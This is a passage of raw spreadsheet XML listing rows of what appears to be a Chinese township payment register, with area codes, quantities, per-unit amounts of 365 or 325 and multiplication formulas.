    <row r="2496" customHeight="1" spans="1:11">
      <c r="A2496" s="23" t="s">
        <v>6606</v>
      </c>
      <c r="B2496" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2496" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2496" s="24" t="s">
        <v>6607</v>
      </c>
      <c r="E2496" s="24" t="s">
        <v>6608</v>
      </c>
      <c r="F2496" s="24" t="s">
        <v>6609</v>
      </c>
      <c r="G2496" s="24">
        <v>1</v>
      </c>
      <c r="H2496" s="25">
        <v>365</v>
      </c>
      <c r="I2496" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2496" s="24" t="s">
        <v>4640</v>
      </c>
      <c r="K2496" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2497" customHeight="1" spans="1:11">
      <c r="A2497" s="23" t="s">
        <v>6610</v>
      </c>
      <c r="B2497" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2497" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2497" s="24" t="s">
        <v>6611</v>
      </c>
      <c r="E2497" s="24" t="s">
        <v>6612</v>
      </c>
      <c r="F2497" s="24" t="s">
        <v>6583</v>
      </c>
      <c r="G2497" s="24">
        <v>1</v>
      </c>
      <c r="H2497" s="25">
        <v>365</v>
      </c>
      <c r="I2497" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2497" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2497" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2498" customHeight="1" spans="1:11">
      <c r="A2498" s="23" t="s">
        <v>6613</v>
      </c>
      <c r="B2498" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2498" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2498" s="24" t="s">
        <v>6614</v>
      </c>
      <c r="E2498" s="24" t="s">
        <v>6615</v>
      </c>
      <c r="F2498" s="24" t="s">
        <v>6583</v>
      </c>
      <c r="G2498" s="24">
        <v>2</v>
      </c>
      <c r="H2498" s="25">
        <v>325</v>
      </c>
      <c r="I2498" s="24">
        <f t="shared" si="38"/>
        <v>650</v>
      </c>
      <c r="J2498" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2498" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2499" customHeight="1" spans="1:11">
      <c r="A2499" s="23" t="s">
        <v>6616</v>
      </c>
      <c r="B2499" s="24" t="str">
        <f>B2498</f>
        <v>乔端镇</v>
      </c>
      <c r="C2499" s="24" t="str">
        <f>C2498</f>
        <v>县社</v>
      </c>
      <c r="D2499" s="107" t="s">
        <v>6617</v>
      </c>
      <c r="E2499" s="108" t="s">
        <v>6598</v>
      </c>
      <c r="F2499" s="24" t="str">
        <f>F2498</f>
        <v>4113211407</v>
      </c>
      <c r="G2499" s="24"/>
      <c r="H2499" s="24"/>
      <c r="I2499" s="24">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="J2499" s="24"/>
      <c r="K2499" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2500" customHeight="1" spans="1:11">
      <c r="A2500" s="23" t="s">
        <v>6618</v>
      </c>
      <c r="B2500" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2500" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="D2500" s="24" t="s">
        <v>6620</v>
      </c>
      <c r="E2500" s="24" t="s">
        <v>6621</v>
      </c>
      <c r="F2500" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2500" s="24">
        <v>2</v>
      </c>
      <c r="H2500" s="25">
        <v>325</v>
      </c>
      <c r="I2500" s="24">
        <f t="shared" ref="I2500:I2563" si="39">H2500*G2500</f>
        <v>650</v>
      </c>
      <c r="J2500" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2500" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2501" customHeight="1" spans="1:11">
      <c r="A2501" s="23" t="s">
        <v>6622</v>
      </c>
      <c r="B2501" s="24" t="str">
        <f>B2500</f>
        <v>马市坪乡</v>
      </c>
      <c r="C2501" s="24" t="str">
        <f>C2500</f>
        <v>马市坪乡</v>
      </c>
      <c r="D2501" s="23" t="s">
        <v>6623</v>
      </c>
      <c r="E2501" s="23" t="s">
        <v>445</v>
      </c>
      <c r="F2501" s="24">
        <f>F2500</f>
        <v>4113211507</v>
      </c>
      <c r="G2501" s="24"/>
      <c r="H2501" s="24"/>
      <c r="I2501" s="24">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="J2501" s="24"/>
      <c r="K2501" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2502" customHeight="1" spans="1:11">
      <c r="A2502" s="23" t="s">
        <v>6624</v>
      </c>
      <c r="B2502" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2502" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="D2502" s="24" t="s">
        <v>6625</v>
      </c>
      <c r="E2502" s="24" t="s">
        <v>6626</v>
      </c>
      <c r="F2502" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2502" s="24">
        <v>1</v>
      </c>
      <c r="H2502" s="25">
        <v>365</v>
      </c>
      <c r="I2502" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2502" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2502" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2503" customHeight="1" spans="1:11">
      <c r="A2503" s="23" t="s">
        <v>6627</v>
      </c>
      <c r="B2503" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2503" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="D2503" s="24" t="s">
        <v>6628</v>
      </c>
      <c r="E2503" s="24" t="s">
        <v>6629</v>
      </c>
      <c r="F2503" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2503" s="24">
        <v>1</v>
      </c>
      <c r="H2503" s="25">
        <v>365</v>
      </c>
      <c r="I2503" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2503" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2503" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2504" customHeight="1" spans="1:11">
      <c r="A2504" s="23" t="s">
        <v>6630</v>
      </c>
      <c r="B2504" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2504" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="D2504" s="24" t="s">
        <v>6631</v>
      </c>
      <c r="E2504" s="24" t="s">
        <v>6632</v>
      </c>
      <c r="F2504" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2504" s="24">
        <v>1</v>
      </c>
      <c r="H2504" s="25">
        <v>365</v>
      </c>
      <c r="I2504" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2504" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2504" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2505" customHeight="1" spans="1:11">
      <c r="A2505" s="23" t="s">
        <v>6633</v>
      </c>
      <c r="B2505" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2505" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2505" s="24" t="s">
        <v>6634</v>
      </c>
      <c r="E2505" s="24" t="s">
        <v>6635</v>
      </c>
      <c r="F2505" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2505" s="24">
        <v>1</v>
      </c>
      <c r="H2505" s="25">
        <v>365</v>
      </c>
      <c r="I2505" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2505" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2505" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2506" customHeight="1" spans="1:11">
      <c r="A2506" s="23" t="s">
        <v>6636</v>
      </c>
      <c r="B2506" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2506" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2506" s="24" t="s">
        <v>6637</v>
      </c>
      <c r="E2506" s="24" t="s">
        <v>6638</v>
      </c>
      <c r="F2506" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2506" s="24">
        <v>1</v>
      </c>
      <c r="H2506" s="25">
        <v>365</v>
      </c>
      <c r="I2506" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2506" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2506" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2507" customHeight="1" spans="1:11">
      <c r="A2507" s="23" t="s">
        <v>6639</v>
      </c>
      <c r="B2507" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2507" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2507" s="24" t="s">
        <v>6640</v>
      </c>
      <c r="E2507" s="24" t="s">
        <v>6641</v>
      </c>
      <c r="F2507" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2507" s="24">
        <v>1</v>
      </c>
      <c r="H2507" s="25">
        <v>365</v>
      </c>
      <c r="I2507" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2507" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2507" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2508" customHeight="1" spans="1:11">
      <c r="A2508" s="23" t="s">
        <v>6642</v>
      </c>
      <c r="B2508" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2508" s="24" t="s">
        <v>6291</v>
      </c>
      <c r="D2508" s="24" t="s">
        <v>6643</v>
      </c>
      <c r="E2508" s="24" t="s">
        <v>6644</v>
      </c>
      <c r="F2508" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2508" s="24">
        <v>1</v>
      </c>
      <c r="H2508" s="25">
        <v>365</v>
      </c>
      <c r="I2508" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2508" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2508" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2509" customHeight="1" spans="1:11">
      <c r="A2509" s="23" t="s">
        <v>6645</v>
      </c>
      <c r="B2509" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2509" s="24" t="s">
        <v>6646</v>
      </c>
      <c r="D2509" s="24" t="s">
        <v>6647</v>
      </c>
      <c r="E2509" s="24" t="s">
        <v>6648</v>
      </c>
      <c r="F2509" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2509" s="24">
        <v>1</v>
      </c>
      <c r="H2509" s="25">
        <v>365</v>
      </c>
      <c r="I2509" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2509" s="24" t="s">
        <v>4640</v>
      </c>
      <c r="K2509" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2510" customHeight="1" spans="1:11">
      <c r="A2510" s="23" t="s">
        <v>6649</v>
      </c>
      <c r="B2510" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2510" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2510" s="24" t="s">
        <v>6650</v>
      </c>
      <c r="E2510" s="24" t="s">
        <v>6651</v>
      </c>
      <c r="F2510" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2510" s="24">
        <v>1</v>
      </c>
      <c r="H2510" s="25">
        <v>365</v>
      </c>
      <c r="I2510" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2510" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2510" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2511" customHeight="1" spans="1:11">
      <c r="A2511" s="23" t="s">
        <v>6652</v>
      </c>
      <c r="B2511" s="24" t="s">
        <v>6619</v>
      </c>
      <c r="C2511" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2511" s="24" t="s">
        <v>6653</v>
      </c>
      <c r="E2511" s="24" t="s">
        <v>6654</v>
      </c>
      <c r="F2511" s="24">
        <v>4113211507</v>
      </c>
      <c r="G2511" s="24">
        <v>1</v>
      </c>
      <c r="H2511" s="25">
        <v>365</v>
      </c>
      <c r="I2511" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2511" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2511" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2512" customHeight="1" spans="1:11">
      <c r="A2512" s="23" t="s">
        <v>6655</v>
      </c>
      <c r="B2512" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2512" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="D2512" s="24" t="s">
        <v>6657</v>
      </c>
      <c r="E2512" s="24" t="s">
        <v>572</v>
      </c>
      <c r="F2512" s="24" t="s">
        <v>6658</v>
      </c>
      <c r="G2512" s="24">
        <v>1</v>
      </c>
      <c r="H2512" s="25">
        <v>365</v>
      </c>
      <c r="I2512" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2512" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2512" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2513" customHeight="1" spans="1:11">
      <c r="A2513" s="23" t="s">
        <v>6659</v>
      </c>
      <c r="B2513" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2513" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="D2513" s="24" t="s">
        <v>6660</v>
      </c>
      <c r="E2513" s="24" t="s">
        <v>6661</v>
      </c>
      <c r="F2513" s="24" t="s">
        <v>6662</v>
      </c>
      <c r="G2513" s="24">
        <v>1</v>
      </c>
      <c r="H2513" s="25">
        <v>365</v>
      </c>
      <c r="I2513" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2513" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2513" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2514" customHeight="1" spans="1:11">
      <c r="A2514" s="23" t="s">
        <v>6663</v>
      </c>
      <c r="B2514" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2514" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="D2514" s="24" t="s">
        <v>6664</v>
      </c>
      <c r="E2514" s="24" t="s">
        <v>6665</v>
      </c>
      <c r="F2514" s="24" t="s">
        <v>6666</v>
      </c>
      <c r="G2514" s="24">
        <v>1</v>
      </c>
      <c r="H2514" s="25">
        <v>365</v>
      </c>
      <c r="I2514" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2514" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2514" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2515" customHeight="1" spans="1:11">
      <c r="A2515" s="23" t="s">
        <v>6667</v>
      </c>
      <c r="B2515" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2515" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="D2515" s="24" t="s">
        <v>6668</v>
      </c>
      <c r="E2515" s="24" t="s">
        <v>6669</v>
      </c>
      <c r="F2515" s="24" t="s">
        <v>6666</v>
      </c>
      <c r="G2515" s="24">
        <v>1</v>
      </c>
      <c r="H2515" s="25">
        <v>365</v>
      </c>
      <c r="I2515" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2515" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2515" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2516" customHeight="1" spans="1:11">
      <c r="A2516" s="23" t="s">
        <v>6670</v>
      </c>
      <c r="B2516" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2516" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="D2516" s="24" t="s">
        <v>6671</v>
      </c>
      <c r="E2516" s="24" t="s">
        <v>6672</v>
      </c>
      <c r="F2516" s="24" t="s">
        <v>6673</v>
      </c>
      <c r="G2516" s="24">
        <v>1</v>
      </c>
      <c r="H2516" s="25">
        <v>365</v>
      </c>
      <c r="I2516" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2516" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2516" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2517" customHeight="1" spans="1:11">
      <c r="A2517" s="23" t="s">
        <v>6674</v>
      </c>
      <c r="B2517" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2517" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="D2517" s="24" t="s">
        <v>6675</v>
      </c>
      <c r="E2517" s="24" t="s">
        <v>6676</v>
      </c>
      <c r="F2517" s="24" t="s">
        <v>6662</v>
      </c>
      <c r="G2517" s="24">
        <v>1</v>
      </c>
      <c r="H2517" s="25">
        <v>365</v>
      </c>
      <c r="I2517" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2517" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2517" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2518" customHeight="1" spans="1:11">
      <c r="A2518" s="23" t="s">
        <v>6677</v>
      </c>
      <c r="B2518" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2518" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2518" s="24" t="s">
        <v>6678</v>
      </c>
      <c r="E2518" s="24" t="s">
        <v>6679</v>
      </c>
      <c r="F2518" s="24" t="s">
        <v>6662</v>
      </c>
      <c r="G2518" s="24">
        <v>1</v>
      </c>
      <c r="H2518" s="25">
        <v>365</v>
      </c>
      <c r="I2518" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2518" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2518" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2519" customHeight="1" spans="1:11">
      <c r="A2519" s="23" t="s">
        <v>6680</v>
      </c>
      <c r="B2519" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2519" s="24" t="s">
        <v>6681</v>
      </c>
      <c r="D2519" s="24" t="s">
        <v>6682</v>
      </c>
      <c r="E2519" s="24" t="s">
        <v>6683</v>
      </c>
      <c r="F2519" s="24" t="s">
        <v>6684</v>
      </c>
      <c r="G2519" s="24">
        <v>1</v>
      </c>
      <c r="H2519" s="25">
        <v>365</v>
      </c>
      <c r="I2519" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2519" s="24" t="s">
        <v>6685</v>
      </c>
      <c r="K2519" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2520" customHeight="1" spans="1:11">
      <c r="A2520" s="23" t="s">
        <v>6686</v>
      </c>
      <c r="B2520" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2520" s="24" t="s">
        <v>6687</v>
      </c>
      <c r="D2520" s="24" t="s">
        <v>6688</v>
      </c>
      <c r="E2520" s="24" t="s">
        <v>6689</v>
      </c>
      <c r="F2520" s="24" t="s">
        <v>6690</v>
      </c>
      <c r="G2520" s="24">
        <v>1</v>
      </c>
      <c r="H2520" s="25">
        <v>365</v>
      </c>
      <c r="I2520" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2520" s="24" t="s">
        <v>6691</v>
      </c>
      <c r="K2520" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2521" customHeight="1" spans="1:11">
      <c r="A2521" s="23" t="s">
        <v>6692</v>
      </c>
      <c r="B2521" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2521" s="24" t="s">
        <v>6693</v>
      </c>
      <c r="D2521" s="24" t="s">
        <v>6694</v>
      </c>
      <c r="E2521" s="24" t="s">
        <v>6695</v>
      </c>
      <c r="F2521" s="24" t="s">
        <v>6696</v>
      </c>
      <c r="G2521" s="24">
        <v>1</v>
      </c>
      <c r="H2521" s="25">
        <v>365</v>
      </c>
      <c r="I2521" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2521" s="24" t="s">
        <v>5913</v>
      </c>
      <c r="K2521" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2522" customHeight="1" spans="1:11">
      <c r="A2522" s="23" t="s">
        <v>6697</v>
      </c>
      <c r="B2522" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2522" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2522" s="24" t="s">
        <v>6698</v>
      </c>
      <c r="E2522" s="24" t="s">
        <v>6699</v>
      </c>
      <c r="F2522" s="24" t="s">
        <v>6662</v>
      </c>
      <c r="G2522" s="24">
        <v>1</v>
      </c>
      <c r="H2522" s="25">
        <v>365</v>
      </c>
      <c r="I2522" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2522" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2522" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2523" customHeight="1" spans="1:11">
      <c r="A2523" s="23" t="s">
        <v>6700</v>
      </c>
      <c r="B2523" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2523" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="D2523" s="24" t="s">
        <v>6701</v>
      </c>
      <c r="E2523" s="24" t="s">
        <v>6702</v>
      </c>
      <c r="F2523" s="24" t="s">
        <v>6658</v>
      </c>
      <c r="G2523" s="24">
        <v>1</v>
      </c>
      <c r="H2523" s="25">
        <v>365</v>
      </c>
      <c r="I2523" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2523" s="41">
        <v>45627</v>
      </c>
      <c r="K2523" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2524" customHeight="1" spans="1:11">
      <c r="A2524" s="23" t="s">
        <v>6703</v>
      </c>
      <c r="B2524" s="107" t="s">
        <v>6656</v>
      </c>
      <c r="C2524" s="109" t="s">
        <v>6704</v>
      </c>
      <c r="D2524" s="109" t="s">
        <v>6705</v>
      </c>
      <c r="E2524" s="107" t="s">
        <v>239</v>
      </c>
      <c r="F2524" s="24" t="s">
        <v>6662</v>
      </c>
      <c r="G2524" s="24">
        <v>1</v>
      </c>
      <c r="H2524" s="25">
        <v>365</v>
      </c>
      <c r="I2524" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2524" s="41">
        <v>45505</v>
      </c>
      <c r="K2524" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2525" customHeight="1" spans="1:11">
      <c r="A2525" s="23" t="s">
        <v>6706</v>
      </c>
      <c r="B2525" s="24" t="s">
        <v>6656</v>
      </c>
      <c r="C2525" s="24" t="s">
        <v>3422</v>
      </c>
      <c r="D2525" s="24" t="s">
        <v>6707</v>
      </c>
      <c r="E2525" s="24" t="s">
        <v>3575</v>
      </c>
      <c r="F2525" s="24" t="s">
        <v>6696</v>
      </c>
      <c r="G2525" s="24">
        <v>1</v>
      </c>
      <c r="H2525" s="25">
        <v>365</v>
      </c>
      <c r="I2525" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2525" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2525" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2526" customHeight="1" spans="1:11">
      <c r="A2526" s="23" t="s">
        <v>6708</v>
      </c>
      <c r="B2526" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2526" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2526" s="24" t="s">
        <v>6711</v>
      </c>
      <c r="E2526" s="24" t="s">
        <v>5061</v>
      </c>
      <c r="F2526" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2526" s="24">
        <v>1</v>
      </c>
      <c r="H2526" s="25">
        <v>365</v>
      </c>
      <c r="I2526" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2526" s="41">
        <v>45108</v>
      </c>
      <c r="K2526" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2527" customHeight="1" spans="1:11">
      <c r="A2527" s="23" t="s">
        <v>6712</v>
      </c>
      <c r="B2527" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2527" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2527" s="24" t="s">
        <v>6713</v>
      </c>
      <c r="E2527" s="24" t="s">
        <v>6714</v>
      </c>
      <c r="F2527" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2527" s="24">
        <v>2</v>
      </c>
      <c r="H2527" s="25">
        <v>325</v>
      </c>
      <c r="I2527" s="24">
        <f t="shared" si="39"/>
        <v>650</v>
      </c>
      <c r="J2527" s="41">
        <v>45108</v>
      </c>
      <c r="K2527" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2528" customHeight="1" spans="1:11">
      <c r="A2528" s="23" t="s">
        <v>6715</v>
      </c>
      <c r="B2528" s="24" t="str">
        <f>B2527</f>
        <v>军工办</v>
      </c>
      <c r="C2528" s="24" t="str">
        <f>C2527</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2528" s="30" t="s">
        <v>6716</v>
      </c>
      <c r="E2528" s="30" t="s">
        <v>5119</v>
      </c>
      <c r="F2528" s="24" t="str">
        <f>F2527</f>
        <v>4113210699</v>
      </c>
      <c r="G2528" s="24"/>
      <c r="H2528" s="24"/>
      <c r="I2528" s="24">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="J2528" s="41"/>
      <c r="K2528" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2529" customHeight="1" spans="1:11">
      <c r="A2529" s="23" t="s">
        <v>6717</v>
      </c>
      <c r="B2529" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2529" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2529" s="24" t="s">
        <v>6718</v>
      </c>
      <c r="E2529" s="24" t="s">
        <v>6719</v>
      </c>
      <c r="F2529" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2529" s="24">
        <v>1</v>
      </c>
      <c r="H2529" s="25">
        <v>365</v>
      </c>
      <c r="I2529" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2529" s="41">
        <v>45108</v>
      </c>
      <c r="K2529" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2530" customHeight="1" spans="1:11">
      <c r="A2530" s="23" t="s">
        <v>6720</v>
      </c>
      <c r="B2530" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2530" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2530" s="24" t="s">
        <v>6721</v>
      </c>
      <c r="E2530" s="24" t="s">
        <v>4844</v>
      </c>
      <c r="F2530" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2530" s="24">
        <v>1</v>
      </c>
      <c r="H2530" s="25">
        <v>365</v>
      </c>
      <c r="I2530" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2530" s="41">
        <v>45108</v>
      </c>
      <c r="K2530" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2531" customHeight="1" spans="1:11">
      <c r="A2531" s="23" t="s">
        <v>6722</v>
      </c>
      <c r="B2531" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2531" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2531" s="24" t="s">
        <v>6723</v>
      </c>
      <c r="E2531" s="24" t="s">
        <v>4758</v>
      </c>
      <c r="F2531" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2531" s="24">
        <v>1</v>
      </c>
      <c r="H2531" s="25">
        <v>365</v>
      </c>
      <c r="I2531" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2531" s="41">
        <v>45108</v>
      </c>
      <c r="K2531" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2532" customHeight="1" spans="1:11">
      <c r="A2532" s="23" t="s">
        <v>6724</v>
      </c>
      <c r="B2532" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2532" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2532" s="24" t="s">
        <v>6725</v>
      </c>
      <c r="E2532" s="24" t="s">
        <v>4758</v>
      </c>
      <c r="F2532" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2532" s="24">
        <v>1</v>
      </c>
      <c r="H2532" s="25">
        <v>365</v>
      </c>
      <c r="I2532" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2532" s="41">
        <v>45108</v>
      </c>
      <c r="K2532" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2533" customHeight="1" spans="1:11">
      <c r="A2533" s="23" t="s">
        <v>6726</v>
      </c>
      <c r="B2533" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2533" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2533" s="24" t="s">
        <v>6727</v>
      </c>
      <c r="E2533" s="24" t="s">
        <v>4847</v>
      </c>
      <c r="F2533" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2533" s="24">
        <v>1</v>
      </c>
      <c r="H2533" s="25">
        <v>365</v>
      </c>
      <c r="I2533" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2533" s="41">
        <v>45108</v>
      </c>
      <c r="K2533" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2534" customHeight="1" spans="1:11">
      <c r="A2534" s="23" t="s">
        <v>6728</v>
      </c>
      <c r="B2534" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2534" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2534" s="24" t="s">
        <v>6729</v>
      </c>
      <c r="E2534" s="24" t="s">
        <v>6730</v>
      </c>
      <c r="F2534" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2534" s="24">
